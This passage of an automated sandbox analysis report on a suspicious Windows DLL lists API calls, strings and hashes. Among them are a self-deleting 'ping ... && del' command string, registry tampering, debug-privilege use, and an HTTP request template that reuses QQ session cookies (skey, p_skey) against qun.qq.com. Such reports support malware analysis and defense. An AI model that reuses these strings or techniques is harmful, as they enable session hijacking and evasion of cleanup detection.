                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp

                                                  Control-flow Graph

                                                  APIs
                                                  • atoi.MSVCRT(?), ref: 10025E9A
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                    • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                    • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • atoi.MSVCRT(?,80000002,?,?,00000004,?,00000000,00000000,00000000), ref: 10026908
                                                    • Part of subcall function 10014CA0: RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                  • Sleep.KERNEL32(000005DC), ref: 10026933
                                                    • Part of subcall function 10014CA0: RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcValue$#823Deleteatoi$Sleep

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • LoadLibraryA.KERNEL32 ref: 1001BA99
                                                  • GetProcAddress.KERNEL32 ref: 1001BB65
                                                  • GetProcAddress.KERNEL32 ref: 1001BDDC
                                                  • GetCurrentProcess.KERNEL32 ref: 1001BE73
                                                  • Sleep.KERNEL32(00000014), ref: 1001BEC5
                                                  • Sleep.KERNEL32(000003E8), ref: 1001BF4C
                                                  • CloseHandle.KERNEL32(?), ref: 1001BF9F
                                                  • CloseHandle.KERNEL32(?), ref: 1001BFBC
                                                  • CloseHandle.KERNEL32(?), ref: 1001BFC7
                                                  • CloseHandle.KERNEL32(?), ref: 1001BFD5
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1001BFDC
                                                  Strings
                                                  Similarity
                                                  • API ID: Handle$Close$AddressLibraryProc$LoadSleep$CurrentFreeModuleProcess
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005D3C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D45
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005D55
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D58
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetPrivateProfileStringA), ref: 10005D6B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D6E
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 10005D81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D84
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 10005D94
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D97
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 10005DA7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005DAA
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 10005DBD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005DC0
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcmpA), ref: 10005DD3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005DD6
                                                  • strchr.MSVCRT ref: 100060F0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006131
                                                  • wsprintfA.USER32 ref: 10006151
                                                  • #823.MFC42(00001000), ref: 100061B3
                                                  • #825.MFC42(?,?,?,00000000,?,?,00000000,?,?), ref: 1000638B
                                                  • #825.MFC42(00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006391
                                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006397
                                                  • #825.MFC42(00000000), ref: 100063DD
                                                    • Part of subcall function 10005A50: LoadLibraryA.KERNEL32 ref: 10005AA7
                                                    • Part of subcall function 10005A50: GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                    • Part of subcall function 10005A50: wsprintfA.USER32 ref: 10005B17
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#825$wsprintf$#823FolderPathSpecialstrchr
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005461
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000546A
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005478
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000547B
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 1000548E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005491
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 100054A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100054A4
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 100054B7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100054BA
                                                  • strchr.MSVCRT ref: 100057B9
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 100057F6
                                                  • wsprintfA.USER32 ref: 10005816
                                                  • #823.MFC42(00001000), ref: 1000583D
                                                  • #825.MFC42(00000000), ref: 1000589B
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#823#825FolderPathSpecialstrchrwsprintf
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001ED7E
                                                  • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 1001EDBD
                                                  • GetCurrentProcess.KERNEL32 ref: 1001EEEB
                                                  • GetCurrentThread.KERNEL32 ref: 1001EEF2
                                                  • GetCurrentProcess.KERNEL32(00000020), ref: 1001EF67
                                                  • GetCurrentThread.KERNEL32 ref: 1001EF6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Current$ModuleProcessThread$AddressEnvironmentFileHandleLibraryLoadNameProcVariable
                                                  • String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$.$2$3$A$A$A$A$COMSPEC$D$F$K$L$N$P$P$R$R$S$T$T$a$a$a$b$c$d$d$d$h$h$i$i$i$i$l$l$l$m$m$o$o$r$r$r$r$r$r$r$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$y
                                                  • API String ID: 2038349478-1119942076
                                                  • Opcode ID: a4e3dd59c46a82729524982bfd22c579546c085d5377921feb853f5f94f67a7a
                                                  • Instruction ID: 4d007deb8cfa1c245ce4efd25164eff218471669c921604140f6b93309afb920
                                                  • Opcode Fuzzy Hash: a4e3dd59c46a82729524982bfd22c579546c085d5377921feb853f5f94f67a7a
                                                  • Instruction Fuzzy Hash: 2CE12A2150C7C089E326C6788449B9FFFD56BE2748F084A5DE2D84B2D2CAFA9548C777
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 10024C06
                                                  • WTSEnumerateSessionsA.WTSAPI32 ref: 10024C3B
                                                  • GetVersionExA.KERNEL32(?), ref: 10024C53
                                                    • Part of subcall function 10024A90: WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
                                                    • Part of subcall function 10024A50: WTSQuerySessionInformationA.WTSAPI32(00000000,?,0000000A,?,?,10024ED1,?,?,?), ref: 10024A6F
                                                    • Part of subcall function 10024B40: WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                    • Part of subcall function 10024B40: WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F03
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F25
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F31
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F3A
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F46
                                                  • LocalSize.KERNEL32(00000000), ref: 10024F54
                                                  • LocalReAlloc.KERNEL32(00000000,00000000,00000042,?,?,?,?), ref: 10024F62
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F73
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024F91
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FA7
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FCF
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10024FE5
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 10025006
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002501C
                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 1002503D
                                                  • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 100250A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Local$AllocInformationQuerySession$Process$CurrentEnumerateFreeMemoryOpenSessionsSizeTokenVersion
                                                  • String ID: AtR$C$C$D$D$I$I$LoSvAtR$Q$RDI$SeDebugPrivilege$SvAtR$c$c$c$c$d$d$d$i$i$i$l$n$n$n$n$n$n$n$n$o$o$o$o$r$s$t$t$t$t$u$v$w$w$y
                                                  • API String ID: 3275454331-1820797497
                                                  • Opcode ID: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                  • Instruction ID: b1de97bb1e532192dcc96ff274dd48cc58c084c44de882cac167928afb279602
                                                  • Opcode Fuzzy Hash: f5624e6b6a617209da6a5c80ef3033c770dc07205c0af6250f8b0743bed6d2d5
                                                  • Instruction Fuzzy Hash: 83E1053050C3C1CEE325CB28C484B9FBBE1AB96708F48495DE5C857352DBBA9909CB67
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exec
                                                  • String ID: &$&$&$&$/$/$1$2$3$4$5$6$:$a$a$a$a$a$c$c$d$d$d$g$g$g$g$i$i$i$l$l$m$n$n$n$n$o$o$o$p$r$r$r$r$r$u$u$u$u$u$u$v$y
                                                  • API String ID: 459137531-3041118241
                                                  • Opcode ID: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                  • Instruction ID: 7bc06bb267aba25a745494efeaf4f4d644bd4b710169c1d4aeb2a62eee067a6f
                                                  • Opcode Fuzzy Hash: b22cca66343ad3003d2291dea90512d45e7e4697c411a4a85f85a143834da450
                                                  • Instruction Fuzzy Hash: 08510C2554E3C1DDE312C668918878FEFD21FB7648E48598DB1C81B393C2AA825CC777
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1000FC8C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000FC95
                                                  • LoadLibraryA.KERNEL32(?,.23L), ref: 1000FCDE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000FCE1
                                                  • GetTickCount.KERNEL32 ref: 1000FD3E
                                                  • sprintf.MSVCRT ref: 1000FD4F
                                                  • GetTickCount.KERNEL32 ref: 1000FD8C
                                                  • sprintf.MSVCRT ref: 1000FD9D
                                                  • lstrcatA.KERNEL32(?,?), ref: 1000FDB3
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000FE19
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000FE20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCountLibraryLoadProcTicksprintf$CloseFileHandleWritelstrcat
                                                  • String ID: .$.23L$2$3$A$A$C$F$G$K$L$N$P$P$R$T$a$a$d$e$e$e$e$e$e$g$h$i$igu$m$n$o$p$p$r$s$t$t$t$u
                                                  • API String ID: 3729143920-1829843242
                                                  • Opcode ID: dcacbf2d7880bdb81e6970219c1f5e7ef38ce43c11cac9833ec278a6e35b28e2
                                                  • Instruction ID: d244896b57f471f380d1962a39cc29ca1bd9ae2e541eca84f9856bfdb779ca2f
                                                  • Opcode Fuzzy Hash: dcacbf2d7880bdb81e6970219c1f5e7ef38ce43c11cac9833ec278a6e35b28e2
                                                  • Instruction Fuzzy Hash: C1916C3110C3C09AE312CB68D848B9BBFD5ABA6718F084A5DF6D4462D2D7BA950CC773
                                                  APIs
                                                  • strstr.MSVCRT ref: 10013BB7
                                                  • strstr.MSVCRT ref: 10013BCA
                                                  • strstr.MSVCRT ref: 10013BDF
                                                  • strncpy.MSVCRT ref: 10013C2B
                                                  • _itoa.MSVCRT ref: 10013C71
                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10013C8A
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10013CB0
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013CBD
                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013CED
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D00
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D03
                                                  • sprintf.MSVCRT ref: 10013D2E
                                                  • HttpSendRequestA.WININET(00000000,?,?,?), ref: 10013D66
                                                  • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 10013D82
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D93
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D96
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013D99
                                                  • atol.MSVCRT ref: 10013DB2
                                                  • #823.MFC42(00000001,?,?), ref: 10013DC0
                                                  • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013DE8
                                                  • #825.MFC42(00000000), ref: 10013DF3
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E02
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E05
                                                  • InternetCloseHandle.WININET(?), ref: 10013E0C
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E24
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013E27
                                                  • InternetCloseHandle.WININET(?), ref: 10013E2E
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E3E
                                                  • #823.MFC42(00000002), ref: 10013E4B
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 10013E75
                                                  • #825.MFC42(00000000), ref: 10013E7C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013E93
                                                  • #823.MFC42(00000001), ref: 10013E9F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013ECA
                                                  • #825.MFC42(00000000), ref: 10013ED1
                                                  • #825.MFC42(00000000,00000000,00000000), ref: 10013EDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                  • String ID: $/cgi-bin/qun_mgr/get_group_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$create$gc=%u&st=0&end=1999&sort=0&%s$gmr$join$p_skey$qun.qq.com$skey=
                                                  • API String ID: 3684279964-3639289013
                                                  • Opcode ID: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                  • Instruction ID: faa93913a6112bf75685c4331b660b6eedd4284dd9d5a7e5e4bfb64d0fa1d1b7
                                                  • Opcode Fuzzy Hash: 990525e5488a96e8453cdc46b1721a0efc440dc8632db5c924d2235e82eb403e
                                                  • Instruction Fuzzy Hash: 97D14876A043142BE310DA689C81FAB77DDEB84760F05463DFB09A72C1EB74ED0587A6
                                                  APIs
                                                  • #356.MFC42 ref: 10007AA2
                                                  • #540.MFC42 ref: 10007AB6
                                                  • #540.MFC42 ref: 10007AC7
                                                  • #540.MFC42 ref: 10007AD8
                                                  • #540.MFC42 ref: 10007AE9
                                                    • Part of subcall function 10008080: #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                    • Part of subcall function 10008080: #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                    • Part of subcall function 10008080: #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                    • Part of subcall function 10008080: #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                    • Part of subcall function 10011E20: #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                    • Part of subcall function 10011E20: #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                    • Part of subcall function 10011E20: #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                    • Part of subcall function 10011E20: #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                  • #858.MFC42 ref: 10007B2F
                                                  • #800.MFC42 ref: 10007B40
                                                  • #537.MFC42(*.*), ref: 10007B59
                                                  • #922.MFC42(?,?,00000000,*.*), ref: 10007B6E
                                                  • #858.MFC42(00000000,?,?,00000000,*.*), ref: 10007B80
                                                  • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007B90
                                                  • #800.MFC42(00000000,?,?,00000000,*.*), ref: 10007BA1
                                                  • #2770.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BB1
                                                  • #2781.MFC42(?,00000000,00000000,?,?,00000000,*.*), ref: 10007BCF
                                                  • #4058.MFC42 ref: 10007BEF
                                                  • #858.MFC42(?), ref: 10007C01
                                                  • #858.MFC42(?,?), ref: 10007C0E
                                                  • #858.MFC42(?,?,?), ref: 10007C1B
                                                  • #3178.MFC42(?,?,?,?), ref: 10007C8A
                                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 10007C9D
                                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CAF
                                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CBF
                                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 10007CD0
                                                  • #1980.MFC42 ref: 10007CED
                                                  • #858.MFC42(?), ref: 10007CF6
                                                  • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007D1E
                                                  • #922.MFC42(?,?,?), ref: 10007D2E
                                                  • #858.MFC42(00000000,?,?,?), ref: 10007D40
                                                  • #800.MFC42(00000000,?,?,?), ref: 10007D51
                                                  • #2770.MFC42(?,00000000,00000000,?,?,?), ref: 10007D61
                                                  • #2781.MFC42(?,00000000,00000000,?,?,?), ref: 10007D7F
                                                  • #4058.MFC42(?,00000000,00000000,?,?,?), ref: 10007D8C
                                                  • #4215.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007DAD
                                                  • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DC6
                                                  • #3324.MFC42(?,00000000,00000000,?,?,?), ref: 10007DE7
                                                  • #3310.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E22
                                                  • #3010.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007E7F
                                                  • #3304.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007ED4
                                                  • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F33
                                                  • #800.MFC42(?,?,?,?,00000000,00000000,?,?,?), ref: 10007F58
                                                  • #3181.MFC42(?,?,00000000,00000000,?,?,?), ref: 10007F6A
                                                  • #941.MFC42(100FA614), ref: 10007F91
                                                  • #6883.MFC42(?,?), ref: 10007FA2
                                                  • #800.MFC42(?,?), ref: 10007FB3
                                                  • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 10007FE1
                                                  • #800.MFC42 ref: 10008015
                                                  • #800.MFC42 ref: 10008026
                                                  • #800.MFC42 ref: 10008037
                                                  • #800.MFC42 ref: 10008048
                                                  • #668.MFC42 ref: 1000805C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
